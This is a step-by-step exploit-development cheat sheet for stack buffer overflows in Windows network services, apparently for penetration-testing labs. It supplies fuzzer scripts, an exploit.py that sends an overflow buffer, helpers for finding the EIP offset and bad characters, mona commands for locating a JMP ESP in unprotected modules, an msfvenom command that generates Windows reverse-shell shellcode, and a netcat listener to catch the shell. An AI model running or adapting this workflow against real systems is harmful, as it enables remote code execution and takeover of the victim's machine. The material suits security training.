# Immunity_Debugger_Workflow
## Fuzzing

Use fuzzer.py or fuzzer2.py until the application crashes inside Immunity Debugger.
```python
# fuzzer.py
import socket, time, sys

IP = "<IP>"
PORT = <PORT>
timeout = 5

# Build 30 strings of increasing length: 100, 200, ..., 3000 bytes
buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append("A" * counter)
    counter += 100

for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        s.connect((IP, PORT))
        s.recv(1024)                      # read the service banner
        print("Fuzzing with %s bytes" % len(string))
        s.send(string.encode())           # sockets take bytes on Python 3
        s.recv(1024)
        s.close()
    except Exception:
        # A timeout or refused connection here usually means the previous
        # string crashed the service: the last length printed is the crash size
        print("Could not connect to " + IP + ":" + str(PORT))
        sys.exit(0)
    time.sleep(1)
```
```python
# fuzzer2.py
import socket

IP = "<IP>"
PORT = <PORT>
payload = 1000 * "A"   # one fixed-size buffer instead of increasing lengths

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((IP, PORT))
    s.send(payload.encode())
    print("[+] " + str(len(payload)) + " Bytes Sent")
except Exception:
    print("[-] Crashed")
```
When the application crashes, EIP should read 41414141: the "A" bytes (0x41) have overwritten the saved return address.
## Crash replication & controlling EIP

### Pattern

Generate a cyclic pattern to find the exact offset at which EIP gets overwritten:

```
!mona pc <SIZE>
```

```sh
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <SIZE>
```

The size must be larger than the crash offset; the buffer length at which the fuzzer crashed is a safe choice. Now set the payload variable to the cyclic pattern:
```python
# exploit.py
import socket

ip = "<IP>"
port = <PORT>

prefix = ""                 # bytes the protocol expects before the overflow (e.g. a command)
offset = 0                  # distance to EIP, found with the cyclic pattern
overflow = "A" * offset
retn = ""                   # address of a JMP ESP (little-endian), filled in later
padding = ""                # NOP sled in front of the shellcode, filled in later
payload = ""                # cyclic pattern now, shellcode later
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    # latin-1 maps every "\xNN" escape to exactly one byte (utf-8 would not)
    s.send((buffer + "\r\n").encode("latin-1"))
    print("Done!")
except Exception:
    print("Could not connect.")
```
Re-run exploit.py; the application should crash again. To find the exact offset, use:

```
!mona findmsp -distance <SIZE>
```

`<SIZE>` is the same length used to create the pattern. The output should contain a line like:

```
EIP contains normal pattern : ... (offset XXXX)
```

Take that offset and modify exploit.py:

- set the offset variable to the offset found
- set the retn variable to "BBBB"
- clear the payload variable (it no longer needs the pattern)

```python
offset = <OFFSET>
overflow = "A" * offset
retn = "BBBB"
payload = ""
```

Re-run exploit.py: EIP should now be 42424242 (the four "B" bytes), which confirms the return address is under control.
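To show what `!mona pc` / `pattern_create.rb` and `!mona findmsp` are doing under the hood, here is an added example (not part of the original workflow or of mona) that builds the same Upper-lower-digit cyclic pattern and maps the EIP value shown by the debugger back to an offset. The function names and the constructed EIP values are mine; it assumes the classic Metasploit pattern scheme, where every 4-byte window is unique within the first 20280 bytes.

```python
import struct
from itertools import product

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280 bytes before it repeats


def pattern_create(length):
    """Same scheme as pattern_create.rb / !mona pc: triplets <Upper><lower><digit>
    (Aa0Aa1...Aa9Ab0...), truncated to `length`. Beyond MAX_UNIQUE the pattern
    repeats and an offset lookup would be ambiguous, so refuse that."""
    if length > MAX_UNIQUE:
        raise ValueError("pattern longer than %d bytes repeats" % MAX_UNIQUE)
    full = "".join(u + l + d for u, l, d in product(UPPER, LOWER, DIGITS))
    return full[:length]


def eip_to_needle(eip):
    """Turn the EIP value shown by the debugger ('41336141' or '0x41336141') into
    the 4 characters that sat at that stack position. x86 is little-endian, so
    EIP=0x41336141 means the bytes 41 61 33 41 ('Aa3A') overwrote the saved
    return address. A plain 4-character string is returned unchanged."""
    text = eip.lower()
    if text.startswith("0x"):
        text = text[2:]
    if len(text) == 8 and all(c in "0123456789abcdef" for c in text):
        return struct.pack("<I", int(text, 16)).decode("latin-1")
    return eip


def pattern_offset(eip, length):
    """Offset of the pattern chunk that landed in EIP, i.e. the number the
    'EIP contains normal pattern : ... (offset XXXX)' line reports, or -1 when
    EIP does not hold part of the pattern (e.g. 41414141 from the plain-'A' fuzzer)."""
    return pattern_create(length).find(eip_to_needle(eip))


if __name__ == "__main__":
    # Constructed example: a 2000-byte pattern was sent and the crash showed EIP=41336141
    print(pattern_create(2000)[:30] + "...")
    print("offset:", pattern_offset("41336141", 2000))
```

The offset printed is the value to put into the `offset` variable of exploit.py; an offset of -1 means the crash was not caused by the pattern bytes and the overflow needs to be re-examined.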
## Bad characters

Generate a byte array of every value except the ones already known to be bad (\x00 is nearly always bad, as it terminates C strings):

```
!mona bytearray -b "\x00"
```

Copy the generated array into the payload variable, re-run exploit.py and, once the application has crashed, compare the bytes in memory at ESP with the file mona wrote:

```
!mona compare -f C:\mona\<PATH>\bytearray.bin -a <ESP_ADDRESS>
```

If bad characters are found, exclude them as well. A corrupted byte often mangles the bytes after it, so exclude the first reported character, regenerate the array and compare again until mona reports it unmodified:

```
!mona bytearray -b "\x00 + <BAD_CHARS>"

# Example
!mona bytearray -b "\x00\x01\x02\x03"
```

Then compare again:

```
!mona compare -f C:\mona\<PATH>\bytearray.bin -a <ESP_ADDRESS>
```
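The `bytearray` / `compare` loop above, as an added example (not mona's code and not part of the original workflow): it generates the same ascending byte array, compares it against what was found in memory at ESP, and treats only the first mismatch as the next bad character, since everything after a mangled byte is unreliable. The memory dump here is constructed by simulating a service that strips line feeds (0x0a); the function names are mine.

```python
def make_bytearray(bad=b"\x00"):
    """All byte values 0x00-0xff minus the ones already known to be bad, in
    ascending order, the same layout !mona bytearray writes to bytearray.bin."""
    excluded = set(bad)
    return bytes(b for b in range(256) if b not in excluded)


def first_difference(sent, seen):
    """Walk the bytes we sent next to what the debugger shows at ESP.
    Returns (offset, sent_byte, seen_byte) for the first mismatch, or None when
    the buffer survived intact. seen_byte is None if memory was truncated."""
    for i, b in enumerate(sent):
        seen_b = seen[i] if i < len(seen) else None
        if seen_b != b:
            return (i, b, seen_b)
    return None


def next_bad_char(bad, seen):
    """One round of the hunt: the byte we sent at the first mismatch is the next
    candidate to exclude. Only the first mismatch is trustworthy, because one
    dropped or converted byte shifts or corrupts everything after it."""
    diff = first_difference(make_bytearray(bad), seen)
    return None if diff is None else diff[1]


def simulated_memory(sent):
    """Constructed stand-in for the memory at ESP: a service that drops 0x0a."""
    return sent.replace(b"\x0a", b"")


def hunt_bad_chars(read_memory, bad=b"\x00"):
    """Repeat generate / send / compare until nothing is modified.
    read_memory(sent) returns the bytes found at ESP after sending `sent`."""
    while True:
        nxt = next_bad_char(bad, read_memory(make_bytearray(bad)))
        if nxt is None:
            return bad
        bad += bytes([nxt])


if __name__ == "__main__":
    found = hunt_bad_chars(simulated_memory)
    print("exclude with: -b \"" + "".join("\\x%02x" % b for b in found) + "\"")
```

The printed string is the argument for the next `!mona bytearray -b` and for msfvenom's `-b` option.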
## Finding a jump point

The shellcode lands where ESP points at the time of the crash, so the return address must point to a `JMP ESP` instruction (opcodes `\xff\xe4`) at an address that contains no bad characters.

### JMP ESP inside the .exe

```
!mona jmp -r esp -cpb "<BAD_CHARS>"
```

### JMP ESP inside a DLL

```
!mona modules
```

Pick a module where Rebase, SafeSEH, ASLR and NXCompat are all False, then search it for the `JMP ESP` opcodes:

```
!mona find -s "\xff\xe4" -m <DLL>
```
## Return address

Choose an address from the results and update exploit.py. The address is written in little-endian byte order (lowest byte first):

```
# Example of a JMP ESP address
0x625011af
```

```python
# exploit.py
retn = "\xaf\x11\x50\x62"   # 0x625011af, little-endian
```
## Generate payload

```sh
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -b "<BAD_CHARS>" -f c
```

Copy the generated shellcode and update exploit.py:

- set the payload variable to the shellcode

## NOP-sled

Place a few NOPs between the return address and the shellcode, so the decoder stub msfvenom prepends has room to unpack without overwriting itself:

```python
padding = "\x90" * 16
```

## Start a listener

```sh
nc -lvp <PORT>
```